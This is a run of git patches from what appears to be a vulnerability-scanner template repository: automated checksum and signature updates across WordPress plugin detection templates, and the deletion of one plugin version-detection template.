http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 @@ -9459,7 +9459,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3c6e959bce2245f9382077875ee0b04e952e1378 +templates-checksum.txt:838a7502bf4d7e24da06ad855dfaea7074eb2e2e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aab82281050bf814fc0706023a44ee2192bcfb94 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 14 Oct 2024 19:35:37 +0700 Subject: [PATCH 065/218] Delete http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml --- .../unlimited-elements-for-elementor.yaml | 48 ------------------- 1 file changed, 48 deletions(-) delete mode 100644 http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml diff --git a/http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml b/http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml deleted file mode 100644 index dd5d538900..0000000000 --- a/http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: wordpress-unlimited-elements-for-elementor - -info: - name: Unlimited Elements For Elementor (Free Widgets, Addons, Templates) Detection - author: ricardomaia - severity: info - reference: - - https://wordpress.org/plugins/unlimited-elements-for-elementor/ - metadata: - plugin_namespace: unlimited-elements-for-elementor - wpscan: https://wpscan.com/plugin/unlimited-elements-for-elementor - tags: tech,wordpress,wp-plugin,top-200 - -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/unlimited-elements-for-elementor/readme.txt" - - payloads: - last_version: helpers/wordpress/plugins/unlimited-elements-for-elementor.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' From 1d16062d8ff34ee8767a724b0296d6e693cd618d Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 12:36:00 +0000 Subject: [PATCH 066/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 - 1 file changed, 1 deletion(-) diff --git a/.new-additions b/.new-additions index 868dd75272..5b06a87c90 100644 --- a/.new-additions +++ b/.new-additions @@ -61,7 +61,6 @@ http/technologies/microsoft/default-azure-function-app.yaml http/technologies/vertigis-detect.yaml http/technologies/wiki-js-detect.yaml http/technologies/windows-communication-foundation-detect.yaml -http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml http/token-spray/api-delighted.yaml http/token-spray/api-intigriti.yaml http/token-spray/api-telegram.yaml From 70230b45126081cb3d3eedcb2959d33d6a66d2c1 Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 12:36:04 +0000 Subject: [PATCH 067/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5f881c2947..0a7c37248c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7989,7 +7989,6 @@ http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5 http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 -http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml:bc4f41a59627fbdcf252d7b53577c70595e62fda http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 @@ -9459,7 +9458,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:838a7502bf4d7e24da06ad855dfaea7074eb2e2e +templates-checksum.txt:277515c4987f854080b8ef6c40eec7f78999e499 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 56fb702009d8e4f0485ea303a2041c98f2c8ea8a Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 12:37:11 +0000 Subject: [PATCH 068/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- dast/vulnerabilities/sqli/sqli-error-based.yaml | 3 +-- http/technologies/wordpress/plugins/ad-inserter.yaml | 2 ++ http/technologies/wordpress/plugins/add-to-any.yaml | 2 ++ http/technologies/wordpress/plugins/admin-menu-editor.yaml | 2 ++ .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 2 ++ http/technologies/wordpress/plugins/akismet.yaml | 2 ++ http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-migration.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 2 ++ http/technologies/wordpress/plugins/amp.yaml | 2 ++ http/technologies/wordpress/plugins/antispam-bee.yaml | 2 ++ http/technologies/wordpress/plugins/astra-sites.yaml | 2 ++ http/technologies/wordpress/plugins/autoptimize.yaml | 2 ++ http/technologies/wordpress/plugins/backwpup.yaml | 2 ++ http/technologies/wordpress/plugins/better-search-replace.yaml | 2 ++ http/technologies/wordpress/plugins/better-wp-security.yaml | 2 ++ .../wordpress/plugins/black-studio-tinymce-widget.yaml | 2 ++ http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 2 ++ http/technologies/wordpress/plugins/breeze.yaml | 2 ++ http/technologies/wordpress/plugins/broken-link-checker.yaml | 2 ++ http/technologies/wordpress/plugins/chaty.yaml | 2 ++ .../wordpress/plugins/child-theme-configurator.yaml | 2 ++ http/technologies/wordpress/plugins/classic-editor.yaml | 2 ++ http/technologies/wordpress/plugins/classic-widgets.yaml | 2 ++ .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 2 ++ http/technologies/wordpress/plugins/cmb2.yaml | 2 ++ http/technologies/wordpress/plugins/coblocks.yaml | 2 ++ http/technologies/wordpress/plugins/code-snippets.yaml | 2 ++ http/technologies/wordpress/plugins/coming-soon.yaml | 2 ++ http/technologies/wordpress/plugins/complianz-gdpr.yaml | 2 ++ .../wordpress/plugins/contact-form-7-honeypot.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-7.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-law-info.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-notice.yaml | 2 ++ http/technologies/wordpress/plugins/copy-delete-posts.yaml | 2 ++ http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 2 ++ .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 2 ++ http/technologies/wordpress/plugins/custom-css-js.yaml | 2 ++ http/technologies/wordpress/plugins/custom-fonts.yaml | 2 ++ http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 2 ++ http/technologies/wordpress/plugins/disable-comments.yaml | 2 ++ http/technologies/wordpress/plugins/disable-gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-page.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-post.yaml | 2 ++ http/technologies/wordpress/plugins/duplicator.yaml | 2 ++ .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 2 ++ .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 2 ++ http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/elementor.yaml | 2 ++ http/technologies/wordpress/plugins/elementskit-lite.yaml | 2 ++ http/technologies/wordpress/plugins/enable-media-replace.yaml | 2 ++ http/technologies/wordpress/plugins/envato-elements.yaml | 2 ++ .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 2 ++ http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 2 ++ http/technologies/wordpress/plugins/extendify.yaml | 2 ++ .../wordpress/plugins/facebook-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/fast-indexing-api.yaml | 2 ++ http/technologies/wordpress/plugins/flamingo.yaml | 2 ++ http/technologies/wordpress/plugins/fluent-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/fluentform.yaml | 2 ++ http/technologies/wordpress/plugins/font-awesome.yaml | 2 ++ .../wordpress/plugins/force-regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/formidable.yaml | 2 ++ http/technologies/wordpress/plugins/forminator.yaml | 2 ++ http/technologies/wordpress/plugins/ga-google-analytics.yaml | 2 ++ .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 2 ++ .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 2 ++ .../wordpress/plugins/google-analytics-for-wordpress.yaml | 2 ++ .../wordpress/plugins/google-listings-and-ads.yaml | 2 ++ http/technologies/wordpress/plugins/google-site-kit.yaml | 2 ++ .../wordpress/plugins/google-sitemap-generator.yaml | 2 ++ http/technologies/wordpress/plugins/gtranslate.yaml | 2 ++ http/technologies/wordpress/plugins/gutenberg.yaml | 2 ++ .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 2 ++ .../wordpress/plugins/header-footer-code-manager.yaml | 2 ++ .../wordpress/plugins/header-footer-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/header-footer.yaml | 2 ++ http/technologies/wordpress/plugins/health-check.yaml | 2 ++ http/technologies/wordpress/plugins/hello-dolly.yaml | 2 ++ http/technologies/wordpress/plugins/host-webfonts-local.yaml | 2 ++ http/technologies/wordpress/plugins/hostinger.yaml | 2 ++ http/technologies/wordpress/plugins/image-optimization.yaml | 2 ++ http/technologies/wordpress/plugins/imagify.yaml | 2 ++ .../wordpress/plugins/insert-headers-and-footers.yaml | 2 ++ http/technologies/wordpress/plugins/instagram-feed.yaml | 2 ++ .../wordpress/plugins/intuitive-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack-boost.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack.yaml | 2 ++ http/technologies/wordpress/plugins/kadence-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/kirki.yaml | 2 ++ http/technologies/wordpress/plugins/leadin.yaml | 2 ++ .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 2 ++ http/technologies/wordpress/plugins/limit-login-attempts.yaml | 2 ++ http/technologies/wordpress/plugins/litespeed-cache.yaml | 2 ++ http/technologies/wordpress/plugins/loco-translate.yaml | 2 ++ http/technologies/wordpress/plugins/loginizer.yaml | 2 ++ .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 2 ++ http/technologies/wordpress/plugins/mailpoet.yaml | 2 ++ http/technologies/wordpress/plugins/maintenance.yaml | 2 ++ http/technologies/wordpress/plugins/mainwp-child.yaml | 2 ++ http/technologies/wordpress/plugins/malcare-security.yaml | 2 ++ http/technologies/wordpress/plugins/megamenu.yaml | 2 ++ http/technologies/wordpress/plugins/members.yaml | 2 ++ http/technologies/wordpress/plugins/meta-box.yaml | 2 ++ http/technologies/wordpress/plugins/metform.yaml | 2 ++ http/technologies/wordpress/plugins/ml-slider.yaml | 2 ++ http/technologies/wordpress/plugins/newsletter.yaml | 2 ++ .../wordpress/plugins/nextend-facebook-connect.yaml | 2 ++ http/technologies/wordpress/plugins/nextgen-gallery.yaml | 2 ++ http/technologies/wordpress/plugins/ninja-forms.yaml | 2 ++ http/technologies/wordpress/plugins/ocean-extra.yaml | 2 ++ .../wordpress/plugins/official-facebook-pixel.yaml | 2 ++ http/technologies/wordpress/plugins/one-click-demo-import.yaml | 2 ++ http/technologies/wordpress/plugins/optinmonster.yaml | 2 ++ http/technologies/wordpress/plugins/otter-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/password-protected.yaml | 2 ++ http/technologies/wordpress/plugins/pdf-embedder.yaml | 2 ++ .../wordpress/plugins/pinterest-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/pixelyoursite.yaml | 2 ++ http/technologies/wordpress/plugins/polylang.yaml | 2 ++ http/technologies/wordpress/plugins/popup-maker.yaml | 2 ++ http/technologies/wordpress/plugins/post-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/post-types-order.yaml | 2 ++ .../wordpress/plugins/premium-addons-for-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/pretty-link.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-captcha.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-ssl.yaml | 2 ++ http/technologies/wordpress/plugins/redirection.yaml | 2 ++ http/technologies/wordpress/plugins/redux-framework.yaml | 2 ++ http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 2 ++ .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 2 ++ http/technologies/wordpress/plugins/safe-svg.yaml | 2 ++ http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 2 ++ http/technologies/wordpress/plugins/sg-cachepress.yaml | 2 ++ http/technologies/wordpress/plugins/sg-security.yaml | 2 ++ http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 2 ++ .../wordpress/plugins/shortpixel-image-optimiser.yaml | 2 ++ .../wordpress/plugins/simple-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/simple-history.yaml | 2 ++ http/technologies/wordpress/plugins/siteguard.yaml | 2 ++ http/technologies/wordpress/plugins/siteorigin-panels.yaml | 2 ++ http/technologies/wordpress/plugins/smart-slider-3.yaml | 2 ++ http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 2 ++ .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 2 ++ .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 2 ++ http/technologies/wordpress/plugins/sucuri-scanner.yaml | 2 ++ http/technologies/wordpress/plugins/svg-support.yaml | 2 ++ http/technologies/wordpress/plugins/tablepress.yaml | 2 ++ http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 2 ++ http/technologies/wordpress/plugins/templately.yaml | 2 ++ http/technologies/wordpress/plugins/the-events-calendar.yaml | 2 ++ http/technologies/wordpress/plugins/tinymce-advanced.yaml | 2 ++ .../wordpress/plugins/translatepress-multilingual.yaml | 2 ++ .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 2 ++ .../wordpress/plugins/under-construction-page.yaml | 2 ++ http/technologies/wordpress/plugins/updraftplus.yaml | 2 ++ http/technologies/wordpress/plugins/user-role-editor.yaml | 2 ++ http/technologies/wordpress/plugins/w3-total-cache.yaml | 2 ++ .../wordpress/plugins/webp-converter-for-media.yaml | 2 ++ http/technologies/wordpress/plugins/webp-express.yaml | 2 ++ .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 2 ++ .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 2 ++ .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 2 ++ .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 2 ++ .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-payments.yaml | 2 ++ .../wordpress/plugins/woocommerce-paypal-payments.yaml | 2 ++ .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-services.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/wordfence.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-importer.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-seo.yaml | 2 ++ http/technologies/wordpress/plugins/worker.yaml | 2 ++ http/technologies/wordpress/plugins/wp-crontrol.yaml | 2 ++ http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wp-file-manager.yaml | 2 ++ http/technologies/wordpress/plugins/wp-google-maps.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-logging.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 2 ++ http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 2 ++ http/technologies/wordpress/plugins/wp-optimize.yaml | 2 ++ http/technologies/wordpress/plugins/wp-pagenavi.yaml | 2 ++ http/technologies/wordpress/plugins/wp-reset.yaml | 2 ++ .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 2 ++ http/technologies/wordpress/plugins/wp-rollback.yaml | 2 ++ http/technologies/wordpress/plugins/wp-seopress.yaml | 2 ++ http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 2 ++ http/technologies/wordpress/plugins/wp-smushit.yaml | 2 ++ http/technologies/wordpress/plugins/wp-statistics.yaml | 2 ++ http/technologies/wordpress/plugins/wp-super-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 2 ++ http/technologies/wordpress/plugins/wpforms-lite.yaml | 2 ++ http/technologies/wordpress/plugins/wps-hide-login.yaml | 2 ++ http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 2 ++ .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 2 ++ 200 files changed, 399 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml index 2258c25745..a69fcbce57 100644 --- a/dast/vulnerabilities/sqli/sqli-error-based.yaml +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -494,5 +494,4 @@ http: - "SQ200: No table " - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" - -# digest: 4b0a00483046022100966a70c7d7be953b8599b861fc338b7cd07ccdf1cbb93d789e504acd7e17088f022100c5479e75293b0b3f63f68b1f52124a544e68ac11490c58b0b8978a07cd882339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220312a2619a0bef4a0328b000b96cf09ecf42226ee9b872709c7a0be7b7816f656022007e96f4d42fb5ee12201d386a057c06a4c1f3f38e4264a6c2459ba1766d3d0e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..cedf86ff34 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e323d58b263489625f1f129cf091ffa5d1ebf65e3540bf94d4b19648d86b01f2022100a6aa672c10473d86bada5ba0af1f3bb4ac1621cea02317b93ed376538a2cd87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..cbc1fcca1d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022028aeb197d7302a378298353bacdc9b3ff8e19b77e4b07e1fa243fd59fa88ac0b022100d68a3e2ac348640b08b6d05e394c972ac510c9a9601857778c43663b4960fedd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..99dc796279 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210089a5a2daab49d50664d6fe558febfb7401d7e8b0a6d9ff5600082b02088c45eb0220304f37bfd86f2f9fd2e577653b60875a63a1567ad7cf947eff08a9585123ae4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 1f02455962..cbf27553ca 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008b3c96beb2250448fdf84d4cd5fdab2c8b82666146fdc63b8e5175199b012eec022100e6c6f80bc964ca01dd83c66089d5bad88c15f1d7402c793f06de38187ef104a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..d6d7bbee44 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022020738b8306c522370ca44e8b2474297da1b4b271520a665d93043d081af63c3602206400be5825d63aafa01b6a8b41470e9e8b81a4ffabd7eaa030149663bc271da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..22333717b7 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220344a40b863450bab36d1fc640fa8d940fd20e3ccbfb7dc2231b78a539af554b402202a8f501dd60ec1402630e22a3ccb38cb142e135bee2fae42d4f62d7009f1c4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..356e3da4a6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220674622483ac7fc6b82216e77e796d5905348ab761d107ff7bcd5ae952155ca63022040835ae04581eec5dab37a941542076d06bb4c0e0027e775622b7aa7a99055f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..0a0bcbde7a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204605ad89ba110f60301e2f5cb8dc0929a4db54d972f739744889a568d871cd740221008e34bf4e0ea205f0f75691a5f1a4a4ec437a208fc12850704847698b72bc57c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..7dc85ad513 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204faffe392049b24bcfa5ee9411df4bef783cc7ad44aa4dc7b95532957c52fd25022100a70a24d1d19e66198499876a04b11d3f2803a0ff5adcab4adb29bcd9069a0014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..b60c118087 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008e97f7ce1c0f70622bcd849195aad24eb09e68dfe1e0dbab8fe3883e4217f342022100b9fe66d5cfebb2d04618064a09425b59312288d27748eaf31adfae0c2509a074:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..6c7e5c2851 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022032e43d112b69faec55c7212e1d957e51c217b5968e01bf475e673d50f7942b2f0221009c65abda740770c392cc846db83a5638992a4bc01819b90ce4866bac829c02c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..bc9a0233b5 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ef682699fbd5c1e1f267ef189b9a421652b1abed556524612a91511ac64933bf022100d1fce072ef280ad4ee9bcf4c5f6324173a6312ceef0c53c9235525a7b9d6ac2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..3a4bdaab4e 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f7aa6af6e64b6c4d9a93619fb3a7ac5918b604ec8380c75b234806c86b4400ce0220773822c1fc4e444f4ed95aa9422115fc1cf8d901fe5e579ae375396864f8b6cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..bfa93d829a 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 